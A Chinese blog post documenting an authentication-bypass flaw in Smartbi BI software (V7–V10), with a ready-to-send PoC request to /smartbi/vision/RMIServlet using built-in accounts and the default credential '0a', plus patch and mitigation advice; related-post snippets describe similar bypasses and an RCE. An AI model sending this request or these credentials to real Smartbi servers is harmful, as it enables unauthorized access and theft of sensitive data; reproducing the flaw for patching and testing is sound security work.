Smartbi 身份认证绕过漏洞

最新推荐文章于 2023-12-25 22:39:56 发布
最新推荐文章于 2023-12-25 22:39:56 发布
阅读量497 收藏 2
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mafucan/article/details/131758795
版权

0x00 简介

Smartbi是广州思迈特软件有限公司旗下的商业智能BI和数据分析产品,致力于为企业客户提供一站式商业智能解决方案。

0x01 漏洞概述

Smartbi在安装时会内置三个用户(public、service、system),在使用特定接口时,可绕过用户身份认证机制获取其身份凭证,随后可使用获取的身份凭证调用后台接口,未经身份验证的攻击者通过该漏洞可获取系统中敏感信息。

0x02 影响版本

V7 <= Smartbi <= V10
0x03漏洞复现
访问目标环境
在这里插入图片描述
poc如下

POST /smartbi/vision/RMIServlet
Host:
className=UserService&methodName=loginFromDB&params=["service","0a"]

GET请求报错,可能存在漏洞
在这里插入图片描述

POST请求,这里使用的是service,内置三个用户(public、service、system),口令都为0a
在这里插入图片描述
xpoc -r 105 -t 校验存在漏洞
在这里插入图片描述

0x04 修复方式

官方措施:
官方已发布修复方案,受影响的用户建议及时下载补丁包进行漏洞修复https://www.smartbi.com.cn/patchinfo
临时措施
在确认不影响业务的前提下,修改内置账号(public、service、system)的默认密文(默认值为0a),或者删除内置账号。非必要尽量不让服务部暴露在公网。

mafucan
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞复现 || Smartbi内置用户登陆绕过
失心少年
07-05 597
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!Smartbi在安装时会内置几个用户,在使用特定接口时,可绕过用户身份认证机制获取其身份凭证,随后可使用获取的身份凭证调用后台接口,可能导致敏感信息泄露和代码执行。1.利用此POC出现如下情况则存在漏洞
smartbi破解文件
04-09
smartbi V7.02破解文件,以及可执行程序可单独联系。 smartbi V7.02破解文件,以及可执行程序可单独联系。
Smartbi内置用户登陆绕过漏洞
holyxp的博客
07-25 566
Smartbi大数据分析产品融合BI定义的所有阶段,对接各种业务数据库、数据仓库和大数据分析平台,进行加工处理、分析挖掘和可视化展现;满足所有用户的各种数据分析应用需求,如大数据分析、可视化分析、探索式分析、复杂报表、应用分享等等。​ Smartbi在安装时会内置几个用户,在使用特定接口时,可绕过用户身份认证机制获取其身份凭证,随后可使用获取的身份凭证调用后台接口,可能导致敏感信息泄露和代码执行。
Smartbi内置用户登陆绕过漏洞复现
0xSec
06-19 4228
Smartbi在安装时会内置几个用户,在使用特定接口时,可绕过用户身份认证机制获取其身份凭证,随后可使用获取的身份凭证调用后台接口,可能导致敏感信息泄露和代码执行。
SmartBI数据分析师认证
01-25
SmartBI数据分析师认证
Smartbi报表设置文档
03-20
Smartbi报表设置文档
Smartbi 未授权访问漏洞.pdf
最新发布
04-22
Smartbi 未授权访问漏洞.pdf
Smart BI-创建审批流程
01-29
资源内包含Smart BI 创建审批流程导出源文件,需要的小伙伴可以自行下载
【严重】Smartbi商业智能BI软件权限绕过漏洞
murphysec的博客
08-02 433
Smartbi是一款商业智能应用,提供了数据集成、分析、可视化等功能,帮助用户理解和使用他们的数据进行决策。在Smartbi受影响版本中存在权限绕过问题,未授权的攻击者可以通过 RMI 的方式调用 getPassword 接口获取管理员token信息。获取管理员权限后,可进入后台实现任意命令执行,进而对目标系统造成破坏或篡改窃取敏感信息。
smartbi使用
06-12
smart比使用
Smartbi:常见Web应用安全漏洞原理与防御介绍
思迈特Smartbi
06-15 746
Web应用是指采用B/S架构、通过HTTP/HTTPS协议提供服务的统称。随着互联网的普及,Web应用已经融入到我们生活中的方方面面。在企业信息化的过程中,越来越多的应用也都架设在Web平台上。在这些Web访问中,大多数应用不是静态的网页浏览,而是涉及到服务器侧的动态处理。此时,如果技术人员的安全意识不足,例如对程序参数输入等检查不严格,就会导致Web应用安全问题层出不穷。轻则篡改网页内容,重则窃取重要内部数据,更为严重的则是在网页中植入恶意代码,使得网站访问者受到侵害。这使得越来越多的用户关注应用层的安全
Smartbi 内置用户登陆绕过漏洞
whoami
08-02 426
Smartbi 大数据分析产品融合 BI 定义的所有阶段,对接各种业务数据库、数据仓库和大数据分析平台,进行加工处理、分析挖掘和可视化展现;满足所有用户的各种数据分析应用需求,如大数据分析、可视化分析、探索式分析、复杂报表、应用分享等等。Smartbi 在安装时会内置几个用户,在使用特定接口时,可绕过用户身份认证机制获取其身份凭证,随后可使用获取的身份凭证调用后台接口,可能导致敏感信息泄露和代码执行。其中params用户可以为public service system其中一个。0a为默认密码的表示。
漏洞复现 || Smartbi 远程命令执行(1Day)
失心少年
07-06 1927
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!Smartbi在远程未授权身份认证的情况下,可在绕过用户身份认证机制后未授权访问windowsunloging接口,且该接口存在反序列化远程代码执行漏洞随后可使用获取的身份凭证调用后台接口最终导致代码执行。
记一次Smartbi登录绕过
紫洋的博客
06-29 507
失败的话更改用户:system,public,service三个内置用户都尝试一遍。有下面的回显说明有可能存在漏洞(有些站点不行)发送请求后刷新登录后台页面就进来了。用Hackbar发送post请求。找到目标站点验证是否存在漏洞。域名后面拼接以下路径。
【高危】Smartbi 登录代码逻辑漏洞
murphysec的博客
07-24 306
Smartbi是一款企业级商业智能与大数据分析平台。由于Smartbi登录代码存在逻辑缺陷,攻击者可利用该漏洞登录管理员账号,进而利用系统后台加载扩展包功能执行任意代码。
Smartbi 修改用户密码漏洞
jennycisp的博客
09-11 118
通过查看 Smartbi 的补丁包信息,发现存在漏洞在某种特定情况下修改用户的密码,进行简单的复现和分析。
关于Smartbi登录代码逻辑漏洞的动态情报
zmcxyyds的博客
12-25 1314
关于Smartbi登录代码逻辑漏洞的动态情报
smartbi 漏洞
02-02
虽然SmartBI是一个功能强大、操作便捷的软件,但是在实际使用中可能存在一些漏洞。 首先,SmartBI可能存在数据泄露的漏洞。由于SmartBI涉及到企业的敏感数据以及商业机密,如果未能完善保护数据的安全性,可能导致...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值